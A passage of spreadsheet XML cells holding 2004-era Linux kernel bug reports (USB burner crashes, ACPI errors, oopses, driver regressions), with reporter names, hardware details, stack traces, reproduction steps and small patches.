11:32:34.785892624 - 0800 @@ -294,6 +294,17 @@ config NR_CPUS This is purely to save memory - each supported CPU requires memory in the static kernel configuration. +config MAX_IO_APICS + int "Maximum number of IO-APICs (1-256)" + range 1 256 + depends on X86_IO_APIC + default "256" if GENERIC_CPU + default "32" + help + This option allows to specify the maximum number of I/O interrupt + controllers (IO-APICs). The maximim supported value is 256 and + the minimum is 1. + config GART_IOMMU bool "IOMMU support" help Steps to reproduce:</t>
  </si>
  <si>
    <t>Jarmo Ilonen</t>
  </si>
  <si>
    <t>fs_samba-smb</t>
  </si>
  <si>
    <t>via-usb2: can</t>
  </si>
  <si>
    <t>2004-11-17 16:02 UTC</t>
  </si>
  <si>
    <t>2004-12-05 19:40 UTC</t>
  </si>
  <si>
    <t>Distribution:Gentoo Hardware:Via-Epia M9000 USB-2 Chipset :0000:00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) I have an USB-burner (usb-2), but the kernel can</t>
  </si>
  <si>
    <t>Kernel 2.6.9 crashes when USB burner plugged off. 2.6.7 works fine.</t>
  </si>
  <si>
    <t>2.6.9 gentoo-r4</t>
  </si>
  <si>
    <t>2004-11-18 04:14 UTC</t>
  </si>
  <si>
    <t>Michael Andrejews</t>
  </si>
  <si>
    <t>2004-12-02 09:32 UTC</t>
  </si>
  <si>
    <t>I have the problem, that i use the gentoo-dev-sources-2.6.9-r1 I have a usb-dvdwriter. It works fine. But if i shut down the USB-burner the kernel crashed. With the 2.6.7 dev-sources there was no problem. Reproducible: Couldn't Reproduce Steps to Reproduce: 1. Changed the kernel scsi and usb settings 2. Tried 2.6.7 kernel 3. Actual Results: With 2.6.7 kernel there was no problem.</t>
  </si>
  <si>
    <t>Wrong CPU flags on Cyrix MII CPU</t>
  </si>
  <si>
    <t>2004-11-18 09:42 UTC</t>
  </si>
  <si>
    <t>2004-11-30 21:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Hardware Environment: PCPartner TXB820DS board (i430TX chipset), Cyrix MII PR300 CPU (3x75MHz) Problem Description: I've noticed some new CPU flags in /proc/cpuinfo that never used to be there. These flags varies with kernel versions: 2.6.8.1: fpu de tsc msr cx8 pge cmov mmx cyrix_arr tm2 2.6.9: fpu de tsc msr cx8 pge cmov mmx cyrix_arr tm2 xtpr 2.6.10-rc1: fpu de tsc msr cx8 pge cmov mmx cyrix_arr est xtpr Steps to reproduce: Do 'cat /proc/cpuinfo' with Cyrix MII CPU</t>
  </si>
  <si>
    <t>Issue threads in SCHED_RR</t>
  </si>
  <si>
    <t>2004-11-18 20:37 UTC</t>
  </si>
  <si>
    <t>Loic Domaigne</t>
  </si>
  <si>
    <t>2005-04-24 08:57 UTC</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------- Distribution: ------------------------------------------------------------------------------- apparently, distributions independant (reproducible on vanilla kernel, Red-Hat, S</t>
  </si>
  <si>
    <t>2.6.7-rc1 to 2.6.10-rc2 hang occasionally - no network, no sysrq</t>
  </si>
  <si>
    <t>2.6.7-rc1 up to 2.6.10-rc2</t>
  </si>
  <si>
    <t>2004-11-19 03:30 UTC</t>
  </si>
  <si>
    <t>Ph. Marek</t>
  </si>
  <si>
    <t>2005-02-14 04:15 UTC</t>
  </si>
  <si>
    <t>Distribution: debian 2.6.8-5, debian 2.6.9-2, linus 2.6.9 Hardware Environment: Celeron 950MHz, 256MB; Sis630 chipset $ lspci -n 0000:00:00.0 0600: 1039:0630 (rev 30) 0000:00:00.1 0101: 1039:5513 (rev d0) 0000:00:01.0 0601: 1039:0018 0000:00:01.1 0200: 1039:0900 (rev 84) 0000:00:01.2 0c03: 1039:7001 (rev 07) 0000:00:01.3 0c03: 1039:7001 (rev 07) 0000:00:01.4 0401: 1039:7018 (rev 02) 0000:00:02.0 0604: 1039:0001 0000:01:00.0 0300: 1039:6300 (rev 21) $ lspci 0000:00:00.0 Host bridge: Silicon Integrated Systems [SiS] 630 Host (rev 30) 0000:00:00.1 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) 0000:00:01.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) 0000:00:01.1 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 84) 0000:00:01.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 0000:00:01.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 0000:00:01.4 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS PCI Audio Accelerator (rev 02) 0000:00:02.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) 0000:01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 630/730 PCI/AGP VGA Display Adapter (rev 21) Software Environment: debian unstable Problem Description: From time to time the machine hangs. It may have something to do with memory management; I have a feeling it happens when some process needs much memory. Running memtest86+ (1.30-1) didn't find a problem after running for some hours. Steps to reproduce: Last time it happened on a manual "swapoff -a"; before on viewing *large* emails in kmail, and editing an ~1MB file in vi (in konsole) It's not hardware plug-and-play; I didn't connect or disconnect anything. It happens from 1-2 times a day up to 4-6 times. There's no reaction to sysrq-u, s, o, b, k, e, i or r; the harddisk led was off. One time it happened while booting; the last line showed the machine was loading the floppy module. I'll attach my .config; any other data needed? Regards, Phil</t>
  </si>
  <si>
    <t>RFE: ability to override SSDT</t>
  </si>
  <si>
    <t>2004-11-19 07:16 UTC</t>
  </si>
  <si>
    <t>2007-08-13 21:19 UTC</t>
  </si>
  <si>
    <t>It would be helpful to have an easy method to override the SSDT, like we have to override the DSDT today. eg. for BIOS bug 3507 ie. CONFIG_ACPI_CUSTOM_SSDT CONFIG_ACPI_CUSTOM_SSDT_FILE</t>
  </si>
  <si>
    <t>getkeycodes and setkeycodes fail with ENODEV</t>
  </si>
  <si>
    <t>2004-11-19 11:24 UTC</t>
  </si>
  <si>
    <t>Vlad Yasevich</t>
  </si>
  <si>
    <t>2004-11-30 13:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Compaq Evo N620c laptop (also tested on N610c) Software Environment: Tested with Kernel 2.6.9-mm1 and 2.6.10-rc2-mm2. The problem does NOT exists in vanilla 2.6.9 and 2.6.10-rc2. Problem Description: getkeycodes and setkeycodes exist with an error KDGETKEYCODE: No such device After doing a bit of digging, it looks like getkeycode() function in drivers/char/keyboard.c returns -ENODEV. Running gdb on the kernel and looking for the keyboard device shows that somehow 'keycodesize' member of the input_dev structure is never set. Not sure why this happens. Steps to reproduce: run getkeycodes of KBD probject.</t>
  </si>
  <si>
    <t>neofb: screen corruption</t>
  </si>
  <si>
    <t>2004-11-19 15:36 UTC</t>
  </si>
  <si>
    <t>Ivan Abramets</t>
  </si>
  <si>
    <t>2004-11-20 10:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: IBM ThinkPad 570 Neomagic Corporation NM2200 [MagicGraph256AV] (rev 20) 440BX Motherboard Software Environment: It happens during kernel loading Problem Description: It happens when kernal begin to load. All characters on the screen are unreadable and contsist of lines and pixels. i can't attach dmesg because i can't see what i type when this bug occurs. As i discovered this bug was born after convertion MODULE_PARM to module_param in neofb module because if copy unconverted neofb from 2.6.10-rc1 to rc2 and compile it everything works ok. Steps to reproduce: Recompile kernel with neofb.</t>
  </si>
  <si>
    <t>Dick Snippe</t>
  </si>
  <si>
    <t>Vladimir Kondratiev</t>
  </si>
  <si>
    <t>Explicit log when VM killing process</t>
  </si>
  <si>
    <t>2004-11-23 00:36 UTC</t>
  </si>
  <si>
    <t>Luc Mazardo</t>
  </si>
  <si>
    <t>2004-11-23 00:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian 3.1 Hardware Environment: i386 Software Environment: Problem Description: I would like to know which process has been killed. printk("VM: killing process %s\n", tsk-&gt;comm); could be: printk("VM: killing process %s (%d)\n", tsk-&gt;comm, tsk-&gt;pid); Steps to reproduce: Sorry I think this is not the good category but I could not find a best one.</t>
  </si>
  <si>
    <t>Badness in cfq_put_request at drivers/block/cfq-iosched.c</t>
  </si>
  <si>
    <t>2.6.9 mm1</t>
  </si>
  <si>
    <t>2004-11-24 01:28 UTC</t>
  </si>
  <si>
    <t>2005-04-15 04:06 UTC</t>
  </si>
  <si>
    <t>Sharyathi</t>
  </si>
  <si>
    <t>Distribution: SLES 9 (updated with 2.6.9 and patched with mm1) Hardware Environment: x235 Software Environment: SLES 9 Problem Description: Badness in cfq_put_request at drivers/block/cfq-iosched.c:1402 [&lt;c0244e6e&gt;] cfq_put_request+0xce/0x110 [&lt;c0239205&gt;] elv_put_request+0x15/0x20 [&lt;c023bb3e&gt;] __blk_put_request+0x4e/0x80 [&lt;c023cd96&gt;] end_that_request_last+0x56/0xf0 [&lt;f8844ea9&gt;] scsi_end_request+0x80/0xa6 [scsi_mod] [&lt;f8845150&gt;] scsi_io_completion+0x117/0x499 [scsi_mod] [&lt;c010c030&gt;] do_gettimeofday+0x20/0xf0 [&lt;f8840b47&gt;] scsi_finish_command+0x7d/0xd1 [scsi_mod] [&lt;f8840a99&gt;] scsi_softirq+0xbf/0xca [scsi_mod] [&lt;c0126114&gt;] __do_softirq+0x64/0xe0 [&lt;c01261bd&gt;] do_softirq+0x2d/0x30 [&lt;c0108fc8&gt;] do_IRQ+0x38/0x60 [&lt;c010770c&gt;] common_interrupt+0x18/0x20 [&lt;c0149e6b&gt;] shrink_cache+0x14b/0x550 [&lt;c014a90b&gt;] shrink_zone+0x9b/0xd0 [&lt;c014adac&gt;] balance_pgdat+0x24c/0x380 [&lt;c014afa7&gt;] kswapd+0xc7/0x110 [&lt;c0134440&gt;] autoremove_wake_function+0x0/0x30 [&lt;c0134440&gt;] autoremove_wake_function+0x0/0x30 [&lt;c014aee0&gt;] kswapd+0x0/0x110 [&lt;c0105275&gt;] kernel_thread_helper+0x5/0x10 Steps to reproduce: build a kernel 2.6.9 with mm1 patch. Execute the dmesg call and look at the output for badness messages.</t>
  </si>
  <si>
    <t>Kernel OOPS on running fsstress test on ext3 file system</t>
  </si>
  <si>
    <t>2004-11-24 01:36 UTC</t>
  </si>
  <si>
    <t>2005-04-15 04:10 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES 9 (Updated with 2.6.9 and patched with mm1) Hardware Environment: x235 Software Environment: SLES 9 Problem Description: kernel OOPS on runing fsstress test case on ext3 file system Oops: 0000 [#1] SMP Modules linked in: ext3 jbd vfat fat jfs usbserial parport_pc lp parport edd joydev sg st sr_mod ide_cd cdrom nvram ohci_hcd sworks_agp agpgart i2c_piix4 i2c_core evdev thermal processor fan button battery ac ipv6 tg3 usbcore dm_mod reiserfs ips sd_mod scsi_mod CPU: 0 EIP: 0060:[&lt;c01484a2&gt;] Not tainted VLI EFLAGS: 00010207 (2.6.9-mm1) EIP is at put_page+0x2/0x80 eax: 00000000 ebx: f6a94800 ecx: 00000000 edx: 00000000 esi: 00000000 edi: f6a94800 ebp: 00000000 esp: cdd49ccc ds: 007b es: 007b ss: 0068 Process fsstress (pid: 24999, threadinfo=cdd48000 task=eef58020) Stack: c017c08f 00000000 c017cef7 f6a94e5c cdd49d00 c011da55 00000000 f6a94e5c 00000000 00000000 00000000 00000000 00000000 00000000 f52fc16c cdd49ef8 00000001 00000fff cdd49eb8 00000000 f52fc16c c017d3a8 cdd49eb8 00000000 Call Trace: [&lt;c017c08f&gt;] dio_cleanup+0x1f/0x30 [&lt;c017cef7&gt;] direct_io_worker+0x387/0x640 [&lt;c011da55&gt;] __wake_up_common+0x35/0x60 [&lt;c017d3a8&gt;] __blockdev_direct_IO+0x1f8/0x2bd [&lt;f936c528&gt;] ext3_direct_io_get_blocks+0x0/0xe3 [ext3] [&lt;f936d373&gt;] ext3_direct_IO+0xc3/0x217 [ext3] [&lt;f936c528&gt;] ext3_direct_io_get_blocks+0x0/0xe3 [ext3] [&lt;c01413a9&gt;] generic_file_direct_IO+0x59/0x80 [&lt;c01404da&gt;] generic_file_direct_write+0x6a/0x160 [&lt;c0142de6&gt;] buffered_rmqueue+0x126/0x250 [&lt;c0140f6b&gt;] generic_file_aio_write_nolock+0x40b/0x480 [&lt;c01410ec&gt;] generic_file_aio_write+0x6c/0xe0 [&lt;f936a3c5&gt;] ext3_file_write+0x24/0x9b [ext3] [&lt;c015bdd7&gt;] do_sync_write+0x97/0xf0 [&lt;c0134440&gt;] autoremove_wake_function+0x0/0x30 [&lt;c0164d63&gt;] sys_fstat64+0x23/0x30 [&lt;c015bd40&gt;] do_sync_write+0x0/0xf0 [&lt;c015bede&gt;] vfs_write+0xae/0xf0 [&lt;c015bfcc&gt;] sys_write+0x3c/0x70 [&lt;c0106d4d&gt;] sysenter_past_esp+0x52/0x71 Code: 1b 00 e9 de fa ff ff e8 15 a0 1b 00 e9 8a fb ff ff e8 e7 9f 1b 00 e9 7d fe ff ff e8 01 a0 1b 00 e9 06 ff ff ff 90 90 90 90 89 c2 &lt;8b&gt; 00 a9 00 80 00 00 75 2f 8b 02 f6 c4 08 75 20 8b 02 89 d1 a9 Steps to reproduce: - create a ext3 file system on one of the disks (sda, sdb... etc) by executing the following command: mkfs.ext3 /dev/sdd - run the fsstress test case on the configured disk.</t>
  </si>
  <si>
    <t>PnP ACPI error</t>
  </si>
  <si>
    <t>2.6.10-rc1 , rc2</t>
  </si>
  <si>
    <t>2004-11-25 08:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge pnp: PnP ACPI init acpi_bus-0073 [10] acpi_bus_get_device : Error getting context for object [c1138508] acpi_bus-0073 [10] acpi_bus_get_device : Error getting context for object [c1138288] acpi_bus-0073 [10] acpi_bus_get_device : Error getting context for object [c1137f48] acpi_bus-0073 [10] acpi_bus_get_device : Error getting context for object [c7fc42c8] pnp: PnP ACPI: found 14 devices</t>
  </si>
  <si>
    <t>map I/O-memory ,system hangs on 2.6 (2.4.18 is o.k!)</t>
  </si>
  <si>
    <t>2.6.5-52</t>
  </si>
  <si>
    <t>2004-11-26 02:20 UTC</t>
  </si>
  <si>
    <t>mueller peter</t>
  </si>
  <si>
    <t>2005-03-09 07:41 UTC</t>
  </si>
  <si>
    <t>Distribution:SuSE 9.1 Hardware Environment: i386 Software Environment: kernel 2.6.5-52 Problem Description: if we lock memory for realtime task with "mlockall (MCL_CURRENT|MCL_FUTURE)" and then we map I/O-space, the system hangs with 2.6 Kernel. if we use "mlockall(MC_CURRENT)" , the system works o.k! With 2.4.18 Kernel , it works allways ok! Steps to reproduce: mlockall(MCL_CURRENT | MCL_FUTURE); fp=open("/dev/mem"); vaddr=mmap(NULL,size,PROT_READ|PROT_WRITE,MAP_SHARED,fp,offset); ----- system hangs ---- offset=0xC0000000+0xD0000 example for ISA offset=0xEE800000 example for PCI</t>
  </si>
  <si>
    <t>i2c or kobject? therm_adt746x in 2.6.10-rc2 cause kernel panic on powerbook g4</t>
  </si>
  <si>
    <t>2004-11-27 06:19 UTC</t>
  </si>
  <si>
    <t>GONG Jie</t>
  </si>
  <si>
    <t>2005-11-21 07:43 UTC</t>
  </si>
  <si>
    <t>Colin Leroy</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Apple PowerBook G4 Al 12" Software Environment: Debian GNU/Linux Sarge Kernel source 2.6.10-rc2 download from www.kernel.org # ./ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux bauxite 2.6.10-rc2-bauxite.17 #1 Sat Nov 27 19:24:03 CST 2004 ppc GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.15 util-linux 2.12 mount 2.12 module-init-tools 3.1-pre6 e2fsprogs 1.35 reiserfsprogs 3.6.19 reiser4progs line quota-tools 3.12. PPP 2.4.2 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.1 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 Modules Loaded hci_usb rfcomm l2cap bluetooth af_packet ipv6 joydev usbhid ohci_hcd eth1394 ehci_hcd usbcore ohci1394 dm_mod evdev sr_mod snd_powermac snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd soundcore snd_page_alloc sbp2 scsi_mod ieee1394 ide_cd cdrom generic unix Problem Description: modprobe therm_adt746x cause segmentation fault. If therm_adt746x is build into kernel, kernel panic while system boot up. Steps to reproduce: # modprobe therm_adt746x adt746x: Thermostat bus: 1, address: 0x2e, limit_adjust: 0, fan_speed: -1 Oops: kernel access of bad area, sig: 11 [#1] NIP: C0116DE8 LR: C0117C88 SP: C6C09DB0 REGS: c6c09d00 TRAP: 0300 Not tainted MSR: 00009032 EE: 1 PR: 0 FP: 0 ME: 1 IR/DR: 11 DAR: 00008124, DSISR: 40000000 TASK = cf0c01d0[4207] 'modprobe' THREAD: c6c08000Last syscall: 128 GPR00: 0000000C C6C09DB0 CF0C01D0 00008124 FFFFFFFE C02270C8 C6C09E50 0000000A GPR08: FFFFFFFF 00008124 C02270C9 C6C09DE8 84002424 1001E284 100013A4 00000000 GPR16: 00000000 00000000 00000000 00000000 100013A4 10019080 10019040 00000000 GPR24: 00000019 C17F6EA0 FFFFFFFF C6C09E50 00008124 00000000 C17F6EB8 C17F6EA0 NIP [c0116de8] strnlen+0x10/0x40 LR [c0117c88] vsnprintf+0x554/0x74c Call trace: [c01143e4] kobject_set_name+0xc8/0xec [c015be44] bus_add_driver+0x44/0x10c [c015c52c] driver_register+0x30/0x40 [c0193c84] i2c_add_driver+0x68/0x12c [d6857170] thermostat_init+0x170/0x3b0 [therm_adt746x] [c00334c0] sys_init_module+0x224/0x324 [c00042e0] ret_from_syscall+0x0/0x44 Segmentation fault</t>
  </si>
  <si>
    <t>Christian Steineck</t>
  </si>
  <si>
    <t>unable to grab dv film through 1394 dv driver</t>
  </si>
  <si>
    <t>2004-11-27 14:12 UTC</t>
  </si>
  <si>
    <t>2004-12-28 11:44 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Hardware Environment: Athlon 2000 base computer, 512Mo, IDE disk, Pinnacle Studio DV card Software Environment: glibc 2.3.2, gcc 3.3.4, libdv 0.103, libraw1394 0.10.1, libavc1394 0.4.1 and libdc1394 1.0.0, dvgrab 1.6 vanilla kernel 2.6.9 build with preempt option, 4K stack, ext3 filesystem, and some debug options. Problem Description: Trying to capture DV video frames from a camcorder connected to the 1394 port of the computer. Using dvgrab to do that. dvgrab puts the camcorder in the play mode, wait for 1/2 second, and stop it and exits. Then it seems it was interrupted in kernel badly by a big sleep inside lock warning. Here is an excerpt of dmesg output (please note I unplugged and plugged several times the camcorder before noticing udev does not create /dev/raw1394 anymore, hence the "repeated" line I think): Nov 27 15:27:55 neptune kernel: ohci1394: fw-host0: SelfID received, but NodeID invalid (probably new bus reset occurred): 0800FFC0 Nov 27 15:27:55 neptune last message repeated 19 times Nov 27 15:28:16 neptune kernel: Debug: sleeping function called from invalid context at mm/slab.c:2052 Nov 27 15:28:16 neptune kernel: in_atomic():1, irqs_disabled():1 Nov 27 15:28:16 neptune kernel: [&lt;c010524e&gt;] dump_stack+0x1e/0x20 Nov 27 15:28:16 neptune kernel: [&lt;c011a1c0&gt;] __might_sleep+0xb0/0xe0 Nov 27 15:28:16 neptune kernel: [&lt;c013fa1f&gt;] __kmalloc+0x8f/0xa0 Nov 27 15:28:16 neptune kernel: [&lt;c02abe59&gt;] alloc_dma_rcv_ctx+0x59/0x3d0 Nov 27 15:28:16 neptune kernel: [&lt;c02a9485&gt;] ohci_devctl+0x3e5/0x630 Nov 27 15:28:16 neptune kernel: [&lt;c029f663&gt;] hpsb_listen_channel+0x43/0x70 Nov 27 15:28:16 neptune kernel: [&lt;c02b01b3&gt;] handle_iso_listen+0xb3/0x150 Nov 27 15:28:16 neptune kernel: [&lt;c02b30bd&gt;] state_connected+0xfd/0x250 Nov 27 15:28:16 neptune kernel: [&lt;c02b3291&gt;] raw1394_write+0x81/0xd0 Nov 27 15:28:16 neptune kernel: [&lt;c01540c0&gt;] vfs_write+0xa0/0x120 Nov 27 15:28:16 neptune kernel: [&lt;c015420b&gt;] sys_write+0x4b/0x80 Nov 27 15:28:16 neptune kernel: [&lt;c01043af&gt;] syscall_call+0x7/0xb Nov 27 15:28:28 neptune kernel: Debug: sleeping function called from invalid context at include/asm/semaphore.h:107 Nov 27 15:28:28 neptune kernel: in_atomic():1, irqs_disabled():1 Nov 27 15:28:28 neptune kernel: [&lt;c010524e&gt;] dump_stack+0x1e/0x20 Nov 27 15:28:28 neptune kernel: [&lt;c011a1c0&gt;] __might_sleep+0xb0/0xe0 Nov 27 15:28:28 neptune kernel: [&lt;c0252db5&gt;] dma_pool_destroy+0x25/0x150 Nov 27 15:28:28 neptune kernel: [&lt;c02abda3&gt;] free_dma_rcv_ctx+0xd3/0x130 Nov 27 15:28:28 neptune kernel: [&lt;c02a9622&gt;] ohci_devctl+0x582/0x630 Nov 27 15:28:28 neptune kernel: [&lt;c029f6c9&gt;] hpsb_unlisten_channel+0x39/0x50 Nov 27 15:28:28 neptune kernel: [&lt;c02b022b&gt;] handle_iso_listen+0x12b/0x150 Nov 27 15:28:28 neptune kernel: [&lt;c02b30bd&gt;] state_connected+0xfd/0x250 Nov 27 15:28:28 neptune kernel: [&lt;c02b3291&gt;] raw1394_write+0x81/0xd0 Nov 27 15:28:28 neptune kernel: [&lt;c01540c0&gt;] vfs_write+0xa0/0x120 Nov 27 15:28:28 neptune kernel: [&lt;c015420b&gt;] sys_write+0x4b/0x80 Nov 27 15:28:28 neptune kernel: [&lt;c01043af&gt;] syscall_call+0x7/0xb Nov 27 15:28:45 neptune kernel: Debug: sleeping function called from invalid context at mm/slab.c:2052 ... after several tries. Seems fairly reproducable. Hardware used to work with 2.4.x and older 2.6.x kernels (do not remember which however, perhaps 2.6.5 - 2.6.7). Steps to reproduce: Just try to grab with dvgrab on a 2.6.9 kernel.</t>
  </si>
  <si>
    <t>Add PCI quirks for ASUS M6Ne Notebook</t>
  </si>
  <si>
    <t>2.6.10rc2</t>
  </si>
  <si>
    <t>2004-11-29 22:43 UTC</t>
  </si>
  <si>
    <t>2004-12-02 22:57 UTC</t>
  </si>
  <si>
    <t>I've prepared a patch to enable smbus support to ASUS M6Ne Notebook</t>
  </si>
  <si>
    <t>Oleg I. Vdovikin</t>
  </si>
  <si>
    <t>tridentfb console at 16 bpp appears in funny colours</t>
  </si>
  <si>
    <t>2004-12-02 02:00 UTC</t>
  </si>
  <si>
    <t>Timothy Lee</t>
  </si>
  <si>
    <t>2004-12-02 13:08 UTC</t>
  </si>
  <si>
    <t>Hardware: CyberBlade/i1 on VIA Epia-800 Problem Description: When the framebuffer is set to 16 bpp, console's text colours are incorrect. For example, white becomes yellow, black becomes blue, etc. Steps to reproduce: 1. Load tridentfb 2. Use "setterm -n -depth 16" to request 16 bpp framebuffer The problem arose from the fact that each psuedo palette entry should be 32-bit in size, even under 16-bit display mode. I will attach a patch.</t>
  </si>
  <si>
    <t>burst-mode EC</t>
  </si>
  <si>
    <t>2004-12-02 12:10 UTC</t>
  </si>
  <si>
    <t>2006-05-18 21:58 UTC</t>
  </si>
  <si>
    <t>2845 3853 4015 4070 4124</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: HP Omnibook 6100 Software Environment: 2.6.9, acpi 20041105 Problem Description: Battery/charge status no longer updated. It stays at the same level all the time. It's still updated then Fan is turned on/off due to thermal zone changes. 2.6.8 (acpi 20040326) works fine, 2.6.9 with acpi 20040816 and 20041105 does not work. Steps to reproduce: Boot and watch cat /proc/acpi/battery/BAT1/state</t>
  </si>
  <si>
    <t>speedstep_coppermine documented in Documentation/kernel-parameters.txt but unusable</t>
  </si>
  <si>
    <t>2004-12-02 12:41 UTC</t>
  </si>
  <si>
    <t>Sandro</t>
  </si>
  <si>
    <t>2004-12-29 14:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Independent Hardware Environment: Pentium 3 Celeron Coppermine Software Environment: Kernel 2.6.9 Problem Description: speedstep_coppermine documented in Documentation/kernel-parameters.txt but unusable. I've a Celeron Coppermine and I was trying to enable the speedstep capability. I've found the kernel parameter, but it refers to a file.c that does not exist... So the parameter is unusable. If the capability is removed by the kernel, the Doc must be updated. If the capability is in the kernel, please document it better. Steps to reproduce: less Documentation/kernel-parameters.txt</t>
  </si>
  <si>
    <t>2005-07-27 17:49 UTC</t>
  </si>
  <si>
    <t>david howard</t>
  </si>
  <si>
    <t>2.6.10-rc3</t>
  </si>
  <si>
    <t>(net sk98lin) driver fails on all kernels post 2.6.7</t>
  </si>
  <si>
    <t>2.6.10 rc3</t>
  </si>
  <si>
    <t>2004-12-05 17:42 UTC</t>
  </si>
  <si>
    <t>RaXeT</t>
  </si>
  <si>
    <t>2006-01-18 11:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: Intel D915 GEV mobo, Marvell Gigabit lan etc Software Environment: Fedora Core 3 Problem Description: sk98lin.ko Steps to reproduce: Just boot any distro - driver is never detected I went to the SysKonnect site and found a patch for the driver dated October 20, 2004, patched the driver in 2.6.9 kernel and it now works. Could the maintainer please explain why nothing has been accomplished since 2.6.7 kernel on this?</t>
  </si>
  <si>
    <t>Cross-compiling fails (patch included)</t>
  </si>
  <si>
    <t>2.6.8 2.6.9 (which I know of)</t>
  </si>
  <si>
    <t>2004-12-09 10:50 UTC</t>
  </si>
  <si>
    <t>Christian Bj</t>
  </si>
  <si>
    <t>2007-10-19 20:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Warty Hardware Environment: AMD64 Software Environment: Debian sarge chroot Problem Description: When cross-compiling modules_install fails because depmod -ae is run from Makefile. When using tools like for example kernel-package in Debian we need to install those to make a kernel-package out of it. But that fails cause you can't depmod i386 modules on x86_64 ;-). Steps to reproduce: Just try to make modules_install under a chroot on another architecture. Patch for wrapping depmod -ae in the makefile in a ifeq: diff -puN Makefile.orig Makefile --- Makefile.orig 2004-12-09 00:08:43.000000000 +0100 +++ Makefile 2004-12-08 23:59:34.000000000 +0100 @@ -788,7 +788,9 @@ depmod_opts := -b $(INSTALL_MOD_PATH) -r endif .PHONY: _modinst_post _modinst_post: _modinst_ +ifeq ([ uname -m ],$(ARCH)) if [ -r System.map ]; then $(DEPMOD) -ae -F System.map $(depmod_opts) $(KERNELRELEASE); fi +endif else # CONFIG_MODULES</t>
  </si>
  <si>
    <t>Lid button freezes Gericom 1460 laptop</t>
  </si>
  <si>
    <t>2004-12-10 00:33 UTC</t>
  </si>
  <si>
    <t>Vitezslav Kotrla</t>
  </si>
  <si>
    <t>2004-12-14 07:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu 'Warty' Gericom Hollywood 1460 laptop (in fact Mitac 8060B, also rebranded as Advent 7041 or Medion MD 40676) totally freezes on pressing lid-closed button. For acpidump and dmidecode see &lt;a href="http://bugme.osdl.org/show_bug.cgi?id=3827"&gt;bug 3827&lt;/a&gt;.</t>
  </si>
  <si>
    <t>Generic hotkey support</t>
  </si>
  <si>
    <t>2004-12-12 04:49 UTC</t>
  </si>
  <si>
    <t>giotto</t>
  </si>
  <si>
    <t>Distribution: Slacware 10.0 Hardware Environment: Toshiba A60-662 laptop Software Environment: Problem Description: no tohiba_acpi support Steps to reproduce: If i enable the toshiba_acpi kernel support, there is no /proc/acpi/toshiba directory and dmesg says: not supported toshiba laptop...</t>
  </si>
  <si>
    <t>(sata ahci) HDD light remains lit constantly when using AHCI SATA Driver</t>
  </si>
  <si>
    <t>2004-12-12 08:23 UTC</t>
  </si>
  <si>
    <t>James Trater</t>
  </si>
  <si>
    <t>2005-08-31 02:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Intel Corp. 82801FR/FRW (ICH6R/ICH6RW) SATA Controller (rev 03) Problem Description: After compiling the 2.6.10-rc3 kernel with AHCI support built-in and changing SATA operation from compatability to AHCI in my bios, my hard drive activity light stays lit constantly after booting into linux. If I reboot into 2.6.9 and change the BIOS setting back to compatability, the light behaves normally (it is only lit when there actually is drive activity.) Steps to reproduce: 1. Build kernel 2.6.10-rc3 with AHCI support 2. reboot with the new kernel and SATA operation set to AHCI 3. Hard drive light will remain lit constantly</t>
  </si>
  <si>
    <t>2.6.10-rc3-mm1</t>
  </si>
  <si>
    <t>pty race condition in 2.6 kernel on SMP machine</t>
  </si>
  <si>
    <t>2004-12-13 16:00 UTC</t>
  </si>
  <si>
    <t>H.J. Lu</t>
  </si>
  <si>
    <t>2005-01-07 16:39 UTC</t>
  </si>
  <si>
    <t>There seems a pty race condition in 2.6 kernel on SMP machines. I have seen it on dual ia32 and ia64 machines under 2.6.10-rc3.</t>
  </si>
  <si>
    <t>Poweroff failure in Gigabyte GA-8SG800/GA-8S648FX(-L) SiS Chipset</t>
  </si>
  <si>
    <t>all 2.6.X and 2.4.X</t>
  </si>
  <si>
    <t>2004-12-14 08:24 UTC</t>
  </si>
  <si>
    <t>Alejandro S</t>
  </si>
  <si>
    <t>2004-12-16 07:37 UTC</t>
  </si>
  <si>
    <t>Distribution: fedora core 2 Hardware Environment: P4 on Gigabyte GA-8SG800/GA-8S648FX(-L) SiS Chipset Software Environment: Problem Description: I cant hibernate to Disk. I tried with suspend2 software without sucess. Poweroff doesnt run too. Typical acpi_power_off called halt appears when i do it. I tried to add acpi=off, acpi=ht, changing apm instead acpi, all ways posible. I use lastest 2.6.X and 2.4.X kernel with all patched version too. I think is a problem of chipset compatibility. I need to solve it, because I have 100 pc and need hibernate to disk function to install a cluster for supercomputation project. Im waiting for your reply.</t>
  </si>
  <si>
    <t>X crashes with inappropraite control error</t>
  </si>
  <si>
    <t>2004-12-14 08:41 UTC</t>
  </si>
  <si>
